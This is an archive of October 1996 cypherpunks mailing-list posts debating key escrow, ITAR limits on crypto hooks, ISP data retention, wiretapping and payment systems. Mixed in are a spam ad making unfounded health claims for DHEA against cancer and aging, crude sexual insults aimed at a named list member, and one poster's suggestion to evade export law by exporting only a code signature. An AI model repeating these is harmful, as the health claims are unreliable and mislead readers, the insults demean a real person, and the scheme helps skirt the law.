> "firmly entrenched" long before it was even legal!

Yep, seems right to me. While I share some part of your position on the 
undesirability of wiretapping, Uni's remarks about it being "firmly 
entrenched" in the minds of L.E. and Capitol Hill are quite on-target.

Few here in DC believe in an absolute right to privacy.

-Declan


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Fri, 11 Oct 1996 07:42:37 -0700 (PDT)
To: svmcguir@syr.edu (Scott McGuire)
Subject: Re: "Drift net fishing," GAK, FBI, and NSA
In-Reply-To: <ML-2.2.844987494.9124.scott@homebox.>
Message-ID: <961011.070615.2E8.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, svmcguir@syr.edu writes:

> roy@scytale.com said 

[re: my debit card]

>> I have one of those, too.  A couple of months ago, Thrifty car rental
>> refused to accept it to rent a car.  (the agent was pretty snotty about
>> it, too)  Beginning of a trend?
>
> Did he recognize that it wasn't a "real" card himself?  I find that many
> cashiers don't know what it is.  If you just say its a Visa (or MC etc.)
> they'll use it.  It works just like a real card when they swipe it.

She recognized it, alright.  Of course, it says "NORWEST Instant Cash
and Check" in brilliant yellow letters.

The exchange was like this:

Me:     offers debit card

Her:    "That's a check cashing card."

Me:     "No, it is _not_ a 'check cashing card'."

Her:    "Well, it's a debit card.  We don't accept those."

No sign, no warning.  If I hadn't been on a tight business schedule, I'd
have walked out.
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
DNRC Minister Plenipotentiary of All Things Confusing, Software Division
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMl45ZRvikii9febJAQH4cAP/X7sjlk2W4ys9VKxwDfb70cQRSoWp0NYX
JWz8b1Od625DN4sVQI6t8eHRPfns696Ac/MeYWT0YvAHAXeK6VoLr+/S7xCGBeAp
G8RjU0VJGzLtHYVgXme+ouM+ksMWj76fwCsy6KyQT5sKtnlCWY81wqnjcS+RxWMa
bFOhNTLRm4o=
=venZ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 11 Oct 1996 07:24:59 -0700 (PDT)
To: "Z.B." <zachb@netcom.com>
Subject: Re: LET'S MEET DIMITRI
In-Reply-To: <Pine.3.89.9610102018.A7812-0100000@netcom12>
Message-ID: <325E56FB.6E4E@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Z.B. wrote:
> On Thu, 10 Oct 1996, Dr.Dimitri Vulis KOTM wrote:
> > Sandy Sandfort <sandfort@crl.com> writes:
> > > his choice of topic, of course.
> > "Timmy May and his sexual perversions". Illustrated with slides.

> Somehow I don't think that would be appropriate for a Cypherpunks
> meeting.  (Not to mention the fact that it has no crypto-relevance :).
> How about you and Tim sit down and *NICELY* talk about your
> differences? It would make a nice change from your one-sided rants to
> the list, and would probably be a lot more civil, too.

What cypherpunks meeting?  Is this a joke?  People are lining up to pay 
for this.  Better than Romans -vs- Christians, etc.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: health@moneyworld.com
Date: Fri, 11 Oct 1996 07:33:46 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Scientific Discoveries Minimize Aging (DHEA)
Message-ID: <199610111432.HAA04080@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


"YOUR Passion for LIFE" is http://dhea.natureplus.com
 
Join 1000's, taking advantage of the amazing natural benefits of DHEA. In the 
search for the ENERGY OF YOUTH, DHEA is a MUST.  

"I can't wait 30 More years for the National Institute on Aging to
save [me]." says Dr. Regelson, a leading DHEA researcher.  

Learn how you can beat Cancer, Heart Disease, Aging, Memory Loss and MORE!

Click on:  http://dhea.natureplus.com 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Fri, 11 Oct 1996 07:40:53 -0700 (PDT)
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: "Drift net fishing," GAK, FBI, and NSA
Message-ID: <v02130500ae8335a7be9d@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>A clarification regarding something I wrote a few days ago:
>
>dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM) writes:
>> Another possibility is to issue a charge card (payable in full at the end of
>> the month, getting revenue from the annual fee), rather than a credit card, s
>> it could claim not to be subject to certain Federal Reserve's regulations tha
>> have to do with credit card disputes. But then it probably can't be Visa/MC a
>> can't use their clearginhouses.
>
>A charge card (like the original AmEx, not like Optima) is not the same as
>a debit card. I have a debit card, tied to my checking account, and using
>mastercard's clearinghouse. To issue a debit card, the organization needs
>to keep checking accounts. Even if it doesn't pay interest, doesn't make
>commercial loans, etc, it still would be subject to weird Fed regulations
>and probably couldn't maintain anonimity.
>
>But the lack of a dispite resolution mechanism is really the killer.
>

How about companies that issue credit cards, but don't extend credit?  The
kind customers must maintain a postive balance at all times in order to
charge against their account.

-- Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@vampire.science.gmu.edu>
Date: Fri, 11 Oct 1996 04:45:53 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: "Forward Privacy" for ISPs and Customers
In-Reply-To: <v03007803ae83cf1f6425@[207.167.93.63]>
Message-ID: <9610111145.AA13292@vampire.science.gmu.edu>
MIME-Version: 1.0
Content-Type: text


by way of Timothy C. May:
> 
> It seems to me that they are actually selling two seperate things.  One is
> connectivity the other storage.  The storage might have a different legal
> status than the connectivity.  So, is email part of the connectivity or the
> storage?  What is the legal status of phone company provided voice mail?  This
> seems pretty close to email.

The storage is sold as a separate service. If you look at ISP adverts,
some offer this, some don't. The legal standing is a bit murky for
data storage as far as I can tell. Some privacy act stuff comes into
play, but I'm curious how similar it is to a "U-Store" type of
rent-a-storage room. 24 hour hot backup facilities & their legal
standing as far as property rights etc. would probably be the best
example I can think of to parallel this to ISP storage.

> Do we know that if phone companies kept recordings of your conversations they
> would have the same legal status as the records that they already keep?

No, they couldn't by definition. Becasue unless otherwise ordered by
the courts to keep your conversations, those conversations are considered
to be not the phone companies property, private, and proprietary to you.
They would be breaking the law if they kept them, because by definiton,
they are your property. The fone corps only own & have rights to the
transport medium, not the content.

> It would be good to get ISP's to work this way regardless of the law.  Its
> better for the data not to exist than have it legally hard to obtain.
Agreed.

> > And, I'm sure the lawyers will agree, while ISPs may be treated essentially
> > the same as telephone companies, absolutely *nothing* requires either to
> > keep specific kinds of account records (*), to "know their customer" (a la
> > banking laws, supposedly), or to record all traffic.
Some of the privacy laws explicitly preclude this sort of behavior in
fact. There is such a thing as too much "knowledge" of a customer.

No, we don't have to make it easy for them. They shouldn't want it to
be easy. This notion that Escrow is a good thing becasue of 
pornographers, terrorists, and criminals is just so much bullshit and
we all know it. It's not an accident that the refrain bears such a
resemblance to Dorthy's (not Denning, but she could play the witch, but
rather the Wizard of OZ) mythical "lions and tigers and bears, oh my".
Dorthy's feared lions and tigers and bears never materialized, and neither
will the ones that Governments allude to.

The notion that it's in my best/greater interest for me to give up *MY*
privacy so that some LEO's job is made easier is just plain stupid,
broken and wrong. My job is not to make their job easier. Their job is
not easy, nor should it ever be in free societies. If they don't like
it, they can go make donuts for a living. But I'm not going to help
them try and redefine things to give them more time to play golf.

That aside, they're deluding themselves. As long as there are
CryptoAnarchists and people willing to create the ability for
common people to maintain (notice I said maintain) privacy in
their lives, they won't win. They can't unless they want to sacrifice
freedom and become totolitarians. 

Key Escrow is bullshit. It's a bad concept, a bad idea, and mainly
satisfies the control needs of a bunch of prune faced uptight stressed
out & paranoid spooks. No one ~needs~ any form of publicly used
key escrow (corps may want it for private internal use, but that's private)
And I'll be damned if I'll ever use it. -Give no ground.


Tim Scanlon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P. J. Ponder" <ponder@freenet.tlh.fl.us>
Date: Fri, 11 Oct 1996 05:14:55 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [NOISE] Funny quote in Word-A-Day
Message-ID: <Pine.OSF.3.91.961011081410.25158A-100000@fn3.freenet.tlh.fl.us>
MIME-Version: 1.0
Content-Type: text/plain


the Word-A-Day mailing list came up with a humorous quote,
almost germane to some of the ramblings on this list....



>Reputation: what others are not thinking about you.
>
>To subscribe or unsubscribe, please send a message to 
>wsmith@wordsmith.org
>with "Subject:" line as "subscribe <Your Real Name>" or "unsubscribe".
>Email anu@wordsmith.org if you have any questions, comments or 
>suggestions.
>Archives, FAQ, words and more at the WWW site: 
>http://www.wordsmith.org/awad/

So long, Perry....
Let us know when you get a new list set up & best wishes.


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2
mQCNAzBz1GQAAAEEANGl0daeboCV8dBSLxycjYd5tIJNOmKN2Y8hCXhF5cLt0nVu
NUDMgmUWF4zoZtBDNbtVF0wTTxEcBEHOLjIuZKPeiT7Bw266HhTahXxOIaOXZyDj
5VMISVvt9/Ua31JfxfCwK0iPtojFtKcNU13z/hrYA7Q5LfqsVF4ZsVsZPDGdAAUT
tClQLkouIFBvbmRlciA8cG9uZGVyQG1haWwuaXJtLnN0YXRlLmZsLnVzPg==
=lVU7
-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 11 Oct 1996 05:30:54 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Kantor on GAK
Message-ID: <1.5.4.16.19961011122915.0a6f0018@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, October 11, 1996, p. A38.


   Clinton's Encryption Plan Fits Law and Market

   To the Editor:

   "A Flawed Encryption Policy" (editorial, Oct. 4)
   mischaracterizes the Clinton Administration's recent
   proposal on data-scrambling software, the proposal's impact
   and the results of a study by the National Research
   Council.

   This Administration has never proposed that United States
   citizens be limited in the type of encryption products they
   choose to use domestically. The current plan relates only
   to exports of encryption products that are, for all
   practical purposes, unbreakable in the commercial
   environment.

   Unbreakable encryption generates the need for "key"
   management among personal and business users of encryption
   products. Users may need a "spare key" to recover
   information that is lost or otherwise inaccessible, in much
   the same way that we give a trusted neighbor a spare key to
   our house. President Clinton's plan insures that the United
   States -- and not other countries -- will develop such a
   system, which both protects and is based on the rule of
   law, not the whim of governments or trade barriers
   masquerading as import restrictions.

   You assume that foreign buyers would not buy key-recovery
   products, but you ignore the trend -- especially in Europe
   -- to require use of key-recovery products and bar the
   import of stronger and stronger encryption products that do
   not take law enforcement into account.

   The number of companies that have expressed a willingness
   to work with the Administration to balance commercial and
   law enforcement issues belies your pronouncement that our
   proposal is unworkable. In fact, the number of companies
   that stand ready now to market such products will soon
   prove that there Is a market for encryption products that
   provide safeguards for both the owner and for society.

   The National Research Council did not say that we should
   allow the export of all encryption. It supported some
   export controls, while allowing the export of encryption up
   to the strength of 56 bits. Our plan allows the export of
   encryption up to 56 bits, but does so in a way that will
   encourage the production and marketing of products that
   both protect privacy and prevent crime.

   The United States is the world leader in information
   technology. Under the Administration's plan, we will remain
   so through a market-driven key-recovery system that both
   promotes the export of encryption products and protects our
   national security and the public safety.

   Mickey Kantor
   U.S. Secretary of Commerce
   Washington, Oct., 9, 1996












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Fri, 11 Oct 1996 06:41:36 -0700 (PDT)
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Microsoft CAPI
In-Reply-To: <199610110558.WAA24031@mail1.best.com>
Message-ID: <325E4DFD.45A9@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


James A. Donald wrote:
> 
> Mike McNally writes:
> >>  And so what happens when the Microsoft key is compromised?
> 
> At 03:13 PM 10/9/96 -0500, Andrew Loewenstern wrote:
> > I ask:  "Who Cares?" ...

> Better than disabling, would be to give the user the choice ...

Agreed, agreed, but my point was to wonder out loud whether such 
"breakages" of the CAPI safety net that gets it the nod for export
would cause the State/Commerce/Spook department to rescind that
permission.

Maybe since the whole export control thing is just an enormous 
government-inflated cloud of FUD it doesn't really matter.

______c_________________________________________________________________
Mike M Nally * IBM % Tivoli * Austin TX  * How quickly we forget that
mailto:m5@tivoli.com mailto:m101@io.com  * "deer processing" and "data
http://www.io.com/~m101/                 * processing" are different!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Verheul <everheul@NGI.NL>
Date: Fri, 11 Oct 1996 00:30:09 -0700 (PDT)
To: "'cypherpunks@toad.com>
Subject: AW: AW: Binding cryptography - a fraud!
Message-ID: <01BBB751.28BF99E0@port15.ztm.pstn.rijnhaave.net>
MIME-Version: 1.0
Content-Type: text/plain


On vrijdag 11 oktober 1996 1:21, Jim McCoy[SMTP:mccoy@communities.com] wrote:
>
>Eric Verheul <everheul@NGI.NL> writes:
>[...]
>>The whole problem is that you don't trust your government, well I do (till
>>some
>>extend). I get the impression that this is a typical USA problem.
>
>If we wanted to be EuroSheep we would be living over there.
Of course, we europeans are too civilized to go into these
kind of childish discussions.

>
>jim
>

Eric





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 11 Oct 1996 06:00:53 -0700 (PDT)
To: frantz@netcom.com
Subject: Re: Why not PGP?
In-Reply-To: <199610101930.MAA18867@netcom8.netcom.com>
Message-ID: <199610110749.IAA00291@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Bill Frantz <frantz@netcom.com> writes:
> >2. Suppose someone writes a program Z that has no expicit crypto code in
> >it, but has hooks for installing one or another version of PGP. Given a
> >copy of Z, someone in this country could install PGP he got from MIT,
> >whereas someone in Europe could install the international version.
> >Would export of Z violate ITAR restrictions?
> 
> Yes

I agree.  However let me elaborate for Rollo: with ITAR there are at
least three aspects:

- what ITAR says

  It says for instance that you can not _talk_ to a foreign national in
  the US about crypto, that you can not show them books, that you can
  not export books etc.  We know this is not enforced (they tried it a
  few times and gave up).  We know books are allowed to be exported,
  examples: Bruce Schneier's Applied Crypto (crypto source code, never
  mind technical descriptions, which ITAR says are illegal to export
  or disclose to foreigners "Disclosing (including oral or visual
  disclosure)" Phil Zimmermann/MIT's PGP source code and internals
  book, the full source code to PGP itself in an OCR font) They don't
  enforce books or discussions anymore because of the clear 1st
  ammendment case against this behaviour.

- and what the NSA, and US government care to interpret ITAR as
  meaning today (they change to suit the case at hand, keeping their
  interpretation purposefully vague)

- what they care to enforce

  NCSA Mosaic had a PGP signature checking hook, they were told to
  take it out.  Microsoft's CAPI arrangement is that they will not
  sign non-US CAPI compliant crypto modules (Examples of enforcement of
  no-hooks interpretation).

  emacs mailcrypt is exported form the US (Emacs RMAIL/GNUS interface
  to PGP - just plug in pgp263i or mit pgp262, an example of
  non-enforcement of no-hooks interpretation)

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 11 Oct 1996 08:32:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: LET'S MEET DIMITRI
In-Reply-To: <Pine.3.89.9610102018.A7812-0100000@netcom12>
Message-ID: <yqXmVD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Z.B." <zachb@netcom.com> writes:

> On Thu, 10 Oct 1996, Dr.Dimitri Vulis KOTM wrote:
> 
> > Sandy Sandfort <sandfort@crl.com> writes:
> > > his choice of topic, of course.
> > 
> > "Timmy May and his sexual perversions". Illustrated with slides.
> > 
> Somehow I don't think that would be appropriate for a Cypherpunks 
> meeting.  (Not to mention the fact that it has no crypto-relevance :).  

No deal, then. I suggest that for your next meeting you book Timmy May to
perform live sex acts on stage with his two cats, as Ray and Zach do the
Macarena circle-jerk.

> How about you and Tim sit down and *NICELY* talk about your differences?  

How about Timmy posting an apology and a retraction to this list?

> It would make a nice change from your one-sided rants to the list, and 
> would probably be a lot more civil, too.

Zach, I don't think you've been on this list long enough to realize that
Timmy started flaming me for no apparent reason, and lying about me, and
attributing to me various shit I never said. I'm just pointing out that
he's a liar and a generally despicable net.scum.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Fri, 11 Oct 1996 06:12:21 -0700 (PDT)
To: kip@monroe.lib.mi.us>
Subject: Re: What are the flaws with FV payment system?
In-Reply-To: <Pine.SUN.3.91.961010103809.463D-100000@monroe.lib.mi.us>
Message-ID: <MmLYS37Cz0E5EjlJMQ@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 10-Oct-96 What are the flaws with FV .. Kip
DeGraaf@monroe.lib.m (1410*)

> I only received this an hour ago.  I would very much like to attend, but 
> can't put my fingers on the detailed analysis of FV's flaws in their 
> system, which I would like to bring up in person at this seminar.  

> Could someone please point me in the right direction?

I'm very sorry that you apparently didn't show up to discuss your
concerns; I thought the talk went quite well, with some good give and
take, but nobody really tried hard to tear apart FV's system.  Believe
it or not, that was a disappointment to me.  I always enjoy an open
debate with a spirited opponent.

FYI, the content of the talk was largely the same as the content of my
paper that appeared in the June issue of Communications of the ACM, in
the special issue on electronic commerce.  Readers of this list will be
particularly interested in the section entitled "Cryptography:  Myths
and Realities".
--------
Nathaniel Borenstein <nsb@fv.com>          |  FAQ & PGP key:
Chief Scientist, First Virtual Holdings    |  nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 11 Oct 1996 05:57:06 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: "Forward Privacy" for ISPs and Customers
In-Reply-To: <v03007800ae831534b603@[207.167.93.63]>
Message-ID: <199610110825.JAA00347@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Tim May <tcmay@got.net> writes:
> At 11:42 AM -0700 10/10/96, Bill Frantz wrote:
> >At 10:13 AM 10/9/96 -0800, Timothy C. May wrote:
> >>[...]
> >One technical approach is described in:
> >
> >"A Revocable Backup System", dabo@cs.princeton.edu (Dan Boneh) and
> >rjl@cs.princeton.edu (Richard J. Lipton) in The 6th USENIX Security
> >Symposium Proceedings.
> >
> >Basically the idea is to encrypt the file on the backup (tape) and then
> >lose the encryption key when you want to "forget" the file.
> 
> Given that keys = data, this just transfers the problem from one set of
> data to another set of data. (Wanna bet a lot of ISPs would keep backups of
> the disk with the keys on it?)

They could always use public key crypto, and use the _user's_ public
key for the users data, then the ISP hasn't got the private key to
leave lying around, or to divulge in case of a supeona.  The backups
are for the _users_ benefit so this puts the onus of key management of
encrypted backups where it belongs, with that user.

Of course, as Ray (?) pointed out, an ISP is going to translate this
into unnecessary complications, and won't bother unless someone offers
a service differentiated on this point, and this kind of service gets
popular.

I'm sure that this would be easy to implement with unix, a shell
script.  If anyone wants one, I'll write it.  (Just have a .pgp-backup
file containing a PGP public key in any directories you want encrypted
backups rather than clear backups, say)

Adam

[the rsa .sig just got smaller still]
--
#!/bin/perl -sisN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsjxII*op"
$/=unpack('H*',<>);print pack('C*',split('\D+',`echo 16i\U$k"SK$/SM$n\E$^I|dc`))




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 11 Oct 1996 09:26:31 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Kantor on GAK
In-Reply-To: <1.5.4.16.19961011122915.0a6f0018@pop.pipeline.com>
Message-ID: <v03007800ae8433cf4e0a@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:29 AM -0400 10/11/96, John Young wrote:
>   The New York Times, October 11, 1996, p. A38.

>   Unbreakable encryption generates the need for "key"
>   management among personal and business users of encryption
>   products. Users may need a "spare key" to recover

As businesses and others point out, if there's a need, let private industry
fill the need. Let the users decide on who, if anyone, holds the spare
keys. The USG proposal takes this choice away and allows access to others.

>   You assume that foreign buyers would not buy key-recovery
>   products, but you ignore the trend -- especially in Europe
>   -- to require use of key-recovery products and bar the
>   import of stronger and stronger encryption products that do
>   not take law enforcement into account.

So, because some countries will not allow import into _their_ countries of
non-GAK software, this means GAK must be mandated on U.S. _exports_? Since
when it is our responsibilty to enforce other nation's import laws?
(Because Iran will not allow the import of blasphemous literature, should
the USG ban all export of such material from the U.S.?)


>   The number of companies that have expressed a willingness
>   to work with the Administration to balance commercial and
>   law enforcement issues belies your pronouncement that our
>   proposal is unworkable. In fact, the number of companies

This conveniently ignores the substantial bludgeon the USG holds over the
heads of all high-tech companies. Their "willingness to work with the
Administration" is comparable to the willingness of a kidnap victim to
"work with" his kidnapper.


>   Mickey Kantor
>   U.S. Secretary of Commerce
>   Washington, Oct., 9, 1996


The real goal is obviously domestic GAK and domestic limits on encryption,
else all this is mostly worthless.

--Tim May



"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 11 Oct 1996 09:33:47 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: "Forward Privacy" for ISPs and Customers
In-Reply-To: <v03007803ae83cf1f6425@[207.167.93.63]>
Message-ID: <v03007801ae8436c4ffe0@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:45 AM -0400 10/11/96, Tim Scanlon wrote:
>by way of Timothy C. May:
           ^^^^^^^^^^^^^^
>>
>> It seems to me that they are actually selling two seperate things.  One is
>> connectivity the other storage.  The storage might have a different legal
>> status than the connectivity.  So, is email part of the connectivity or the
>> storage?  What is the legal status of phone company provided voice mail?
>>This
>> seems pretty close to email.


Careful with the attribution--I did not write anything in the paragraph above.


However, I agree with most of the points you made.

>That aside, they're deluding themselves. As long as there are
>CryptoAnarchists and people willing to create the ability for
>common people to maintain (notice I said maintain) privacy in
>their lives, they won't win. They can't unless they want to sacrifice
>freedom and become totolitarians.
>
>Key Escrow is bullshit. It's a bad concept, a bad idea, and mainly
>satisfies the control needs of a bunch of prune faced uptight stressed
>out & paranoid spooks. No one ~needs~ any form of publicly used
>key escrow (corps may want it for private internal use, but that's private)
>And I'll be damned if I'll ever use it. -Give no ground.

--Tim May


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 11 Oct 1996 09:48:38 -0700 (PDT)
To: Adam Back <frantz@netcom.com
Subject: Re: Why not PGP?
Message-ID: <199610111648.JAA20799@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:49 AM 10/11/96 +0100, Adam Back wrote:
>- what they care to enforce
>
>  NCSA Mosaic had a PGP signature checking hook, they were told to
>  take it out.  Microsoft's CAPI arrangement is that they will not
>  sign non-US CAPI compliant crypto modules (Examples of enforcement of
>  no-hooks interpretation).

Does that fix the "export only the signature" problem (for the 
government)/opportunity (for the rest of us)?   You know, present Microsoft 
with the software, don't tell them it's already out of the US, and they sign 
it.  Export the signature only  (who cares if this is legal!) and edit the 
international software to contain the signature.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craigw@dg.ce.com.au
Date: Thu, 10 Oct 1996 16:54:33 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Creative Wiretap Arguments [Was :Re: Put up or shut up]
Message-ID: <199610102351.JAA18178@mac.ce.com.au>
MIME-Version: 1.0
Content-Type: text/plain


The introduction of the digital mobile network was deleayed several 
months here in australia (this was several years back). The delay was 
based on the need to be able to intercept digital communications. 
Untill a backdoor was built into the system, the Federal Police would 
and did not let the cel net go online.
 
> >Which raises the issue, "Is the ISP required to install 'wiretap-friendly'
> >capability?"  Apparently not, if the cellular phone industry is any
> >precedent:  For awhile, cops couldn't easily tap cell phones because no such
> >capability had been designed into the cell-site software.  Such an omission
> >was not considered a violation of law.
 

        ,'~``.              \|/              ,'``~.
        (-o=o-)            (@ @)            ,(-o=o-),
+--.oooO--(_)--Ooo-----oOO-(_)-OOo-------oooO--(_)--Oooo.------+
|                                                              |
|   Soon, we may all be staring at our computers, wondering    |
|               whether they're staring back.                  |
|                                                              |
| [Network Admin For WPA Business Products.  aka doshai >;-) ] |
|    .oooO        http://pip.com.au/~doshai/      Oooo.        |
|    (   )   Oooo.                        .oooO   (   )        |
+-----\ (----(   )-------oooO-Oooo--------(   )--- ) /---------+
       \_)    ) /                          \ (    (_/
             (_/                            \_)
Key fingerprint = 2D F4 54 BB B4 EA F1 E7  B6 DE 48 92 FC 8D FF 49
Send a message with the subject "send pgp-key" for a copy of my key.
(if I want to give it to you)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marc J. Wohler" <mwohler@ix.netcom.com>
Date: Fri, 11 Oct 1996 07:43:55 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Dimitri & Roberto Alamar
Message-ID: <199610111443.HAA03388@dfw-ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


KTOM  is  rude crude & lude. His insane rants have a damaging effect on this
list.
Any donations in his behalf should be given for therapy.
List members should give him the Roberto Alamar treatment.
mjw





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kip DeGraaf <kip@monroe.lib.mi.us>
Date: Fri, 11 Oct 1996 07:49:45 -0700 (PDT)
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: Re: What are the flaws with FV payment system?
In-Reply-To: <MmLYS37Cz0E5EjlJMQ@nsb.fv.com>
Message-ID: <Pine.SUN.3.91.961011103322.15063A-100000@monroe.lib.mi.us>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 11 Oct 1996, Nathaniel Borenstein wrote:

> Excerpts from mail: 10-Oct-96 What are the flaws with FV .. Kip
> DeGraaf@monroe.lib.m (1410*)
> 
> > I only received this an hour ago.  I would very much like to attend, but 
> > can't put my fingers on the detailed analysis of FV's flaws in their 
> > system, which I would like to bring up in person at this seminar.  
> 
> > Could someone please point me in the right direction?
> 
> I'm very sorry that you apparently didn't show up to discuss your
> concerns; I thought the talk went quite well, with some good give and
> take, but nobody really tried hard to tear apart FV's system.  Believe
> it or not, that was a disappointment to me.  I always enjoy an open
> debate with a spirited opponent.

I'm rather sorry too.  I found the information at http://www.c2.org/nofv 
to be of interest and would have liked an answer to the privacy issue 
specifically and the other issues brought up by that document.

Unfortunately I had a work-related problem that kept me from 
leaving Monroe in time to make the trip up to East Lansing.

If you would answer that point on privacy, that was to be the main 
interest I had in attending the meeting.  Having read through the 
material offered at http://www.fv.com, I still feel the privacy issue and 
the ability to intercept email confirmations still haven't been 
addressed.  You discuss email interception in 
http://www.fv.com/pubdocs/FAQ-security.txt, but that document is from 
Nov, 1995 and doesn't address the concern adequately in my opinion.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 11 Oct 1996 08:47:33 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Why Workers Should Uphold Right Not To Talk To FBI
In-Reply-To: <53k4ot$efp@berlin.infomatch.com>
Message-ID: <463mVD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Path: perun!news2.panix.com!panix!feed1.news.erols.com!arclight.uoregon.edu!news.bc.net!berlin.infomatch.com!not-for-mail
From: bghauk@berlin.infomatch.com (Brian Hauk)
Newsgroups: nyc.general,ny.general,ny.politics
Subject: Why Workers Should Uphold Right Not To Talk To FBI
Message-ID: <53k4ot$efp@berlin.infomatch.com>
Date: 11 Oct 1996 00:35:41 GMT
Organization: InfoMatch Internet - Vancouver BC
Lines: 160
NNTP-Posting-Host: berlin.infomatch.com
X-Newsreader: TIN [UNIX 1.3 950824BETA PL0]

Why Workers Should Uphold Right Not To Talk To FBI
************************************************************************
from the Militant, vol.60/no.36                         October 14, 1996

   
